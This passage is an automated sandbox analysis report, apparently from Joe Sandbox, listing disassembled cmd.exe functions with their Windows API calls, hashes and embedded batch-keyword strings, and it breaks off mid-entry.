                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: longjmp
                                                                                        • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                        • API String ID: 1832741078-366822981
                                                                                        • Opcode ID: cb2474cb4c8f4fed68dc920ae07f6b083c56284836b8b63d7249ce1bb3750b5c
                                                                                        • Instruction ID: e1211f1ba82a4d4f0f5faabe24a2e6d69a88efa866459573ee91e6f18d6fe8e7
                                                                                        • Opcode Fuzzy Hash: cb2474cb4c8f4fed68dc920ae07f6b083c56284836b8b63d7249ce1bb3750b5c
                                                                                        • Instruction Fuzzy Hash: 74A10478600604EBCF28AF54D48597D7B2AFB44390B24C016F44687794D7B0DD9ACBB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,00000000,00000000,00DA0AF0,00002000,00000000,00000000,00000000,00000000), ref: 00D67ED4
                                                                                          • Part of subcall function 00D6A62F: wcschr.MSVCRT ref: 00D6A635
                                                                                        • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,00000000,00000000,00DA0AF0,00002000,?), ref: 00D67F16
                                                                                        • _ultoa.MSVCRT ref: 00D7AFC9
                                                                                        • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 00D7AFDE
                                                                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 00D7AFF3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                        • String ID: Application$System
                                                                                        • API String ID: 3538039442-3455788185
                                                                                        • Opcode ID: f8a1ffb6d96cfa8f12b3c1c8a7c6b8927a0afd57a5553d63acf7cf8d5747b7dd
                                                                                        • Instruction ID: 57d29259fe60804c36f2703c6aef24285478c69c16a2f1a0cab1af5a998abd52
                                                                                        • Opcode Fuzzy Hash: f8a1ffb6d96cfa8f12b3c1c8a7c6b8927a0afd57a5553d63acf7cf8d5747b7dd
                                                                                        • Instruction Fuzzy Hash: B241B271740319BBDB109BA8CC49FAEBBA9EF4A751F204129F506EB281E7709D04C771
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcschr$_wcsicmpiswspace
                                                                                        • String ID: :.\$=,;$=,;+/[] "
                                                                                        • API String ID: 1913572127-843887632
                                                                                        • Opcode ID: cb895784f2f43058888e2687e19e339a56147e5b34e48284f1cb1548ed2d233f
                                                                                        • Instruction ID: c25322c8399d2c5dffd2fc446ad4cbf59edd858fcb4c986dea68eea118b7f2e6
                                                                                        • Opcode Fuzzy Hash: cb895784f2f43058888e2687e19e339a56147e5b34e48284f1cb1548ed2d233f
                                                                                        • Instruction Fuzzy Hash: BBA1C238A043149BDF34CBADD884BBA77B1BF44314F180299E84AA7291E770DD85CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D69E8E: iswspace.MSVCRT ref: 00D69E9E
                                                                                        • wcsrchr.MSVCRT ref: 00D85406
                                                                                        • wcschr.MSVCRT ref: 00D8541C
                                                                                        • wcsrchr.MSVCRT ref: 00D8544C
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00D8546B
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D8547B
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D85497
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00D8549F
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D854B3
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00D854D4
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 00D85501
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D85557
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00D85578
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                                                                        • String ID:
                                                                                        • API String ID: 4166807220-0
                                                                                        • Opcode ID: 0d4bab8b5bdf5421ee9f719e72abf5bd2b6b69c63402adecc64da8a3b839b17b
                                                                                        • Instruction ID: e22604028622260662076b308127994c99b75d2ec15e9b8d127b53e76773ae0f
                                                                                        • Opcode Fuzzy Hash: 0d4bab8b5bdf5421ee9f719e72abf5bd2b6b69c63402adecc64da8a3b839b17b
                                                                                        • Instruction Fuzzy Hash: AA51CF306002189BDB25BB38EC09BA977E9FF01310F1485E9E486D22D4EF708E85CBB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 00D67669
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D67670
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008), ref: 00D67686
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D6768D
                                                                                        • _wcsicmp.MSVCRT ref: 00D67719
                                                                                        • _wcsicmp.MSVCRT ref: 00D6772B
                                                                                        • _wcsicmp.MSVCRT ref: 00D67758
                                                                                        • _wcsicmp.MSVCRT ref: 00D7AA79
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap_wcsicmp$AllocProcess
                                                                                        • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                        • API String ID: 435930816-3086019870
                                                                                        • Opcode ID: d438abfd8b60b4c627db070f54c1325fb4d7edf3e9c0966030114c511ff610e1
                                                                                        • Instruction ID: 33e558392213c20165eb13ed574016e5802dd836b1f5702c50a5fa928c0fac26
                                                                                        • Opcode Fuzzy Hash: d438abfd8b60b4c627db070f54c1325fb4d7edf3e9c0966030114c511ff610e1
                                                                                        • Instruction Fuzzy Hash: C851E4716093029FD718DF78EC05A2A3BE5EF49318B28456EE846C7391FB61D802CB76
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D8AF04
                                                                                        • memset.MSVCRT ref: 00D8AF2E
                                                                                        • memset.MSVCRT ref: 00D8AF58
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,00D6250C,?,?,00000000,-00000105,-00000105,-00000105), ref: 00D8B08B
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 00D8B095
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 00D8B0AA
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D8B1DA
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D8B1F2
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D8B20A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ErrorLast$InformationVolume
                                                                                        • String ID: %04X-%04X
                                                                                        • API String ID: 2748242238-1126166780
                                                                                        • Opcode ID: 1a5ef7ed7edc1d8d1539525202df458aabacca30e0913bf7df007d8c45cfe366
                                                                                        • Instruction ID: 54e680ec13ca7309abd5d50002013bfddc4d809aec59b9fe093ce94a57ef8227
                                                                                        • Opcode Fuzzy Hash: 1a5ef7ed7edc1d8d1539525202df458aabacca30e0913bf7df007d8c45cfe366
                                                                                        • Instruction Fuzzy Hash: 9491B2B1A002289BDB24EB64CC95BEAB7B8EF14354F4445EAF509D7240EB349E84CF70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$iswspace
                                                                                        • String ID: =,;
                                                                                        • API String ID: 3458554142-1539845467
                                                                                        • Opcode ID: ba21ca831418b5939e504dd30bf5b7b80ced23decb2a26f20d6aa2960ac97bea
                                                                                        • Instruction ID: cca50fe1bb23b8a9ee15a1450f6d8ff0d74ed10d3afe599ef3b682d41a3a167b
                                                                                        • Opcode Fuzzy Hash: ba21ca831418b5939e504dd30bf5b7b80ced23decb2a26f20d6aa2960ac97bea
                                                                                        • Instruction Fuzzy Hash: 56818DB59002158BDB309F68CC557BA73A5EF10325F18486BE98AEA241EB758DC4CF71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D72431
                                                                                        • memset.MSVCRT ref: 00D72452
                                                                                        • memset.MSVCRT ref: 00D7247C
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00D6250C,00000000,00000000,?,-00000105,-00000105,-00000105), ref: 00D72585
                                                                                        • _wcsicmp.MSVCRT ref: 00D725A3
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D725CA
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D725E3
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D7F32B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$InformationVolume_wcsicmp
                                                                                        • String ID: FAT
                                                                                        • API String ID: 4247940253-238207945
                                                                                        • Opcode ID: ecd913e746d7c4f162e4daedc9c4bf607a44c4fd18f0e1380cb8b48ee052c74b
                                                                                        • Instruction ID: 60285a851e9dea5d640d9558228b53ace9d14bd80738073d5bbbc7965db0f43a
                                                                                        • Opcode Fuzzy Hash: ecd913e746d7c4f162e4daedc9c4bf607a44c4fd18f0e1380cb8b48ee052c74b
                                                                                        • Instruction Fuzzy Hash: 3F5141B19102599BDF24CBA4DC99BEAB7B8EB44305F1840A9E509E3181FB74DE84CF35
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D67381
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,?,00000000,?), ref: 00D673D6
                                                                                        • wcsncmp.MSVCRT(?,\\.\,00000004,?,00000000,?), ref: 00D673F9
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D67465
                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00001037,00000000,?,?), ref: 00D7A8C6
                                                                                          • Part of subcall function 00D70060: wcschr.MSVCRT ref: 00D7006C
                                                                                        • wcsstr.MSVCRT ref: 00D7A87E
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00D7A89B
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D7A8DE
                                                                                          • Part of subcall function 00D7589A: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,00D759D0,?,00D66054,-00001038,00000000,?,?), ref: 00D758BB
                                                                                          • Part of subcall function 00D7589A: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D758CD
                                                                                          • Part of subcall function 00D68B4D: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00D899FD,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D68B7B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                        • String ID: \\.\
                                                                                        • API String ID: 799470305-2900601889
                                                                                        • Opcode ID: 4efa418b2fb83b4c00fa935decdebbb87bdaf3278f048c9a1f559050bc34a1d4
                                                                                        • Instruction ID: d836fd0735fe10f2da304666ec3ad082f147c5b0fd3d95e1ce3873689f2009ba
                                                                                        • Opcode Fuzzy Hash: 4efa418b2fb83b4c00fa935decdebbb87bdaf3278f048c9a1f559050bc34a1d4
                                                                                        • Instruction Fuzzy Hash: EB51F6716083119BD7309B78988866FBBE8EF85754F14492AF899C3291EB70E805C7B3
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$iswspace$_wcsicmp
                                                                                        • String ID: &<|>$+: $=,;
                                                                                        • API String ID: 3089800946-2256444845
                                                                                        • Opcode ID: 54266c8987511336297a5d96097a2a5c03b1c3c70eea3641bf688aa7c11e5fcb
                                                                                        • Instruction ID: 784cb5fb53d60ac4b29ef663dc6985820ecb841bd47905d70e373d90979aba13
                                                                                        • Opcode Fuzzy Hash: 54266c8987511336297a5d96097a2a5c03b1c3c70eea3641bf688aa7c11e5fcb
                                                                                        • Instruction Fuzzy Hash: A1312531A003244BCB204BA9AC497AA77A6EF56305F188166EC4DD3212F7319964CBB6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D8C0F8: free.MSVCRT(?,?,00000000,?,00D8424F), ref: 00D8C116
                                                                                          • Part of subcall function 00D8C0F8: free.MSVCRT(?,?,00000000,?,00D8424F), ref: 00D8C123
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001,00000000,?,00000000), ref: 00D8BB97
                                                                                        • qsort.MSVCRT ref: 00D8BC1A
                                                                                        • wcschr.MSVCRT ref: 00D8BC6F
                                                                                        • calloc.MSVCRT ref: 00D8BCB1
                                                                                        • calloc.MSVCRT ref: 00D8BD82
                                                                                        • wcschr.MSVCRT ref: 00D8BDCB
                                                                                        • memcpy.MSVCRT ref: 00D8BE1D
                                                                                        • memcpy.MSVCRT ref: 00D8BE3E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                                                                        • String ID: &()[]{}^=;!%'+,`~
                                                                                        • API String ID: 975110957-381716982
                                                                                        • Opcode ID: c4ad83367f8f447d1848fbbc9330e58ee8878dc2fa4ee01242392d6a09afcbb5
                                                                                        • Instruction ID: 7815205035ccd7f3298ffe0294bf4659af145221f45274625effedf59d5ddbe3
                                                                                        • Opcode Fuzzy Hash: c4ad83367f8f447d1848fbbc9330e58ee8878dc2fa4ee01242392d6a09afcbb5
                                                                                        • Instruction Fuzzy Hash: 06C1B376A002159FDB24AF68D841BAEBBB1FF48720F19406AE849E7341EB309D45CB74
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _tell.MSVCRT ref: 00D6B7F9
                                                                                        • _close.MSVCRT ref: 00D6B82C
                                                                                        • memset.MSVCRT ref: 00D6B8CC
                                                                                        • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 00D6B936
                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00D9C9F0), ref: 00D6B947
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D6B96D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleInfoOutput_close_tellmemset
                                                                                        • String ID: GOTO
                                                                                        • API String ID: 1380661413-1693823284
                                                                                        • Opcode ID: 5f34f5beae00755d735851141365c59f067702f5fa7fb964fa4b875c36b4a282
                                                                                        • Instruction ID: 9d5591703ef6ab94bd89f8f4d788840a997bb4000e782063c17d8a10f04b51e0
                                                                                        • Opcode Fuzzy Hash: 5f34f5beae00755d735851141365c59f067702f5fa7fb964fa4b875c36b4a282
                                                                                        • Instruction Fuzzy Hash: EAB19070A143018FDB20EF68D84472AB7E5EF84714F18592EE889D7291EB70DD85CBB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                                                                        • String ID: +-~!
                                                                                        • API String ID: 2191331888-2604099254
                                                                                        • Opcode ID: c7efd8978c691a87d61175f5461a8b08d7628cf34e3e9ee3f04357362d2155c8
                                                                                        • Instruction ID: f77d97066af33436f71ff176f57194cec691a19abef0873059be964ea8de5e47
                                                                                        • Opcode Fuzzy Hash: c7efd8978c691a87d61175f5461a8b08d7628cf34e3e9ee3f04357362d2155c8
                                                                                        • Instruction Fuzzy Hash: 37517972400209EFCB10DF68D8499EA37A5EF06320B54C526FC4A9B150FBB5DB00EBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • towupper.MSVCRT ref: 00D87277
                                                                                        • iswalpha.MSVCRT ref: 00D872AA
                                                                                        • towupper.MSVCRT ref: 00D872BD
                                                                                        • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 00D872EF
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D87304
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D87311
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                                                                        • String ID: $%04X-%04X$\
                                                                                        • API String ID: 4001382275-467840296
                                                                                        • Opcode ID: e3a5c24454928aaecce7cd29fbefbcb3f4d6f762485c02ecdf84e06529fdee47
                                                                                        • Instruction ID: 4df9cefd33029be69cb029668eef09c84dd00a46734c553d34640680bdefd886
                                                                                        • Opcode Fuzzy Hash: e3a5c24454928aaecce7cd29fbefbcb3f4d6f762485c02ecdf84e06529fdee47
                                                                                        • Instruction Fuzzy Hash: 7D41C572608310ABD720BBA59C0AA7B77ECEF99B10F18441EF999C61C0E770D940D7B6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00D83877), ref: 00D82D31
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSingleWait
                                                                                        • String ID: wil
                                                                                        • API String ID: 24740636-1589926490
                                                                                        • Opcode ID: f3e30eef26a2315208e3b8fe3ebdf59c6a58039586d00f792a34de719539b56b
                                                                                        • Instruction ID: 4e5226904db07972c474ad2baaf99f16a143353aa1f0f467873c46c3bfc7ea80
                                                                                        • Opcode Fuzzy Hash: f3e30eef26a2315208e3b8fe3ebdf59c6a58039586d00f792a34de719539b56b
                                                                                        • Instruction Fuzzy Hash: 83318030304204ABEB21BB64CC89BBB3A6EEF41351F644536F882D6291D774CE51D7BA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,0000000A,?), ref: 00D88360
                                                                                        • _ultoa.MSVCRT ref: 00D88376
                                                                                        • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 00D8838B
